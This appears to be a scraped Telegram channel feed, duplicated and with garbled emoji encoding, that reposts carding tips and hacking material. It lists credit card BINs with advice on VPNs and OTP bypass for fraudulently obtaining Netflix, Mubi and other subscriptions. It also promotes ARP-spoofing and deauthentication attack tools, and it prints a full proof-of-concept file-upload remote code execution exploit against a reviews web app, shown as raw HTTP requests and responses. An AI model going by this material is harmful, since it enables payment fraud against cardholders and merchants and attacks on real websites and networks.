Forwarded from TARJETAS PRO UNDER CARDING
π¦ Bin For DC Universe :
> BIN ~ 421303xxxxxxxxxx
Date/Cvv ~ Random
IP ~ USAπΊπ²
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
> BIN ~ 421303xxxxxxxxxx
Date/Cvv ~ Random
IP ~ USAπΊπ²
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
π¦ Bin For Private Tunnel
BIN ~ 516579xxxxxxxxxx
Date/Cvv ~ Random
IP ~ USAπΊπ²
https://portal.privatetunnel.com/signup?logout=1
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
BIN ~ 516579xxxxxxxxxx
Date/Cvv ~ Random
IP ~ USAπΊπ²
https://portal.privatetunnel.com/signup?logout=1
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
π¦ x4 Bins For Mubi 30 Days Premium
548977xxxxxxxxxx
552230xxxxxxxxxx
539817xxxxxxxxxx
543896xxxxxxxxxx
https://mubi.com/t/web/global/gteb5hp
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
548977xxxxxxxxxx
552230xxxxxxxxxx
539817xxxxxxxxxx
543896xxxxxxxxxx
https://mubi.com/t/web/global/gteb5hp
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
MUBI
Are you ready for 30 days of great cinema
Every day we hand-pick a beautiful film and all you've gotta do is watch.
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
π¦ x2 Bins For Netflix Premium
Bin : 379217xxxxx100x (Live Cvv)
IP : USA πΊπΈ
Zip Code : 10080
NOTE :
βοΈ USE GOOD VPN
βοΈ OTP BYPASSING THROUGH GODADDY SMARTLINE
> BIN Netflix
Bin : 413100xxxxxxxxxx
CVV : RND
Date : RND
IP : Philippines π΅π
OTP : use go daddy bin for numbers
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
Bin : 379217xxxxx100x (Live Cvv)
IP : USA πΊπΈ
Zip Code : 10080
NOTE :
βοΈ USE GOOD VPN
βοΈ OTP BYPASSING THROUGH GODADDY SMARTLINE
> BIN Netflix
Bin : 413100xxxxxxxxxx
CVV : RND
Date : RND
IP : Philippines π΅π
OTP : use go daddy bin for numbers
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
Forwarded from TARJETAS PRO UNDER CARDING
# SUPPORT & SHARE FOR MORE
T.me/UndercodeTesting
T.me/UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ A Common User Passwords generator script that looks like the tool Eliot used it in Mr.Robot Series Episode 01 :
fb.com/undercodeTesting
1)git clone https://github.com/D4Vinci/elpscrk.git
2) cd elpscrk
3) python elpscrk.py
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ A Common User Passwords generator script that looks like the tool Eliot used it in Mr.Robot Series Episode 01 :
fb.com/undercodeTesting
1)git clone https://github.com/D4Vinci/elpscrk.git
2) cd elpscrk
3) python elpscrk.py
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ An advanced network scan and attack script based on GUI. 2nd version of no-GUI netattack new
instagram.com/undercodeTesting
π¦FEATURES :
> SCANNING
Scan your network for active hosts, their operating system, open ports and way more.
Scan for Access-Points and figure out encryption type, WPS and other useful data.
> SPOOFING/SNIFFING
Simple ARP Spoofing
DNS Sniffing by ARP Spoofing the target and listening to DNS-Queries
> KICKING
Kicking hosts off your internet using ARP-Spoof attack
> DEAUTHING
Send deauthentication packets to Access Points in your area (DoS)
Deauth-All, basically does the same but it scans for networks and attacks them periodically
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/chrizator/netattack2.git
2) cd netattack2
3) python netattack2.py
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ An advanced network scan and attack script based on GUI. 2nd version of no-GUI netattack new
instagram.com/undercodeTesting
π¦FEATURES :
> SCANNING
Scan your network for active hosts, their operating system, open ports and way more.
Scan for Access-Points and figure out encryption type, WPS and other useful data.
> SPOOFING/SNIFFING
Simple ARP Spoofing
DNS Sniffing by ARP Spoofing the target and listening to DNS-Queries
> KICKING
Kicking hosts off your internet using ARP-Spoof attack
> DEAUTHING
Send deauthentication packets to Access Points in your area (DoS)
Deauth-All, basically does the same but it scans for networks and attacks them periodically
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/chrizator/netattack2.git
2) cd netattack2
3) python netattack2.py
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - chrizator/netattack2: An advanced network scan and attack script based on GUI. 2nd version of no-GUI netattack.
An advanced network scan and attack script based on GUI. 2nd version of no-GUI netattack. - GitHub - chrizator/netattack2: An advanced network scan and attack script based on GUI. 2nd version of n...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more
pinterest.com/Undercode_Testing
π¦ πβπππΈπππππΈπππβ & βπβ :
> Zip
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip
> Git (Small)
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
Git (Complete)
git clone https://github.com/danielmiessler/SecLists.git
> Kali Linux (Tool Page)
apt -y install seclists
π¦ enjoy it
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more
pinterest.com/Undercode_Testing
π¦ πβπππΈπππππΈπππβ & βπβ :
> Zip
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip
> Git (Small)
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
Git (Complete)
git clone https://github.com/danielmiessler/SecLists.git
> Kali Linux (Tool Page)
apt -y install seclists
π¦ enjoy it
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) on Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦VERIFIED THE Facb bug - 2019 VERIFIED BY UNDERCODE
t.me/UndercodeTesting
# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
# Dork: N/A
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
#
POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 922
Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php
Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------4704926813981: undefined
Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------4704926813981
Content-Disposition: form-data; name="hidden_photo"
-----------------------------4704926813981
Content-Disposition: form-data; name="name"
Efe
-----------------------------4704926813981
Content-Disposition: form-data; name="rating"
4.5
-----------------------------4704926813981
Content-Disposition: form-data; name="review"
Efe
-----------------------------4704926813981
Content-Disposition: form-data; name="date"
12/14/2018
-----------------------------4704926813981
Content-Disposition: form-data; name="id"
-----------------------------4704926813981
Content-Disposition: form-data; name="submit"
submit
-----------------------------4704926813981--
HTTP/1.1 302 Found
Date: Fri, 14 Dec 2018 18:17:48 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: custom_reviews.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/reviews/custom_reviews.php
Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 14 Dec 2018 18:17:49 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
@UnDERCODETesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦VERIFIED THE Facb bug - 2019 VERIFIED BY UNDERCODE
t.me/UndercodeTesting
# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
# Dork: N/A
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
#
POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 922
Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php
Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------4704926813981: undefined
Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------4704926813981
Content-Disposition: form-data; name="hidden_photo"
-----------------------------4704926813981
Content-Disposition: form-data; name="name"
Efe
-----------------------------4704926813981
Content-Disposition: form-data; name="rating"
4.5
-----------------------------4704926813981
Content-Disposition: form-data; name="review"
Efe
-----------------------------4704926813981
Content-Disposition: form-data; name="date"
12/14/2018
-----------------------------4704926813981
Content-Disposition: form-data; name="id"
-----------------------------4704926813981
Content-Disposition: form-data; name="submit"
submit
-----------------------------4704926813981--
HTTP/1.1 302 Found
Date: Fri, 14 Dec 2018 18:17:48 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: custom_reviews.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/reviews/custom_reviews.php
Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 14 Dec 2018 18:17:49 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
@UnDERCODETesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ BEST SITES FOR SHARING CODE & TEXT LIKE PAST BIN :
> https://controlc.com/
> https://hastebin.com/
> https://justpaste.me/
> https://privatebin.net/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ BEST SITES FOR SHARING CODE & TEXT LIKE PAST BIN :
> https://controlc.com/
> https://hastebin.com/
> https://justpaste.me/
> https://privatebin.net/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Controlc
ControlC Pastebin - The easiest way to host your text
The ControlC pastebin is the original next generation tool for sharing text. We offer a full suite of tools and a affiliate program for users to make money. Formerly known as Pasted and Tinypaste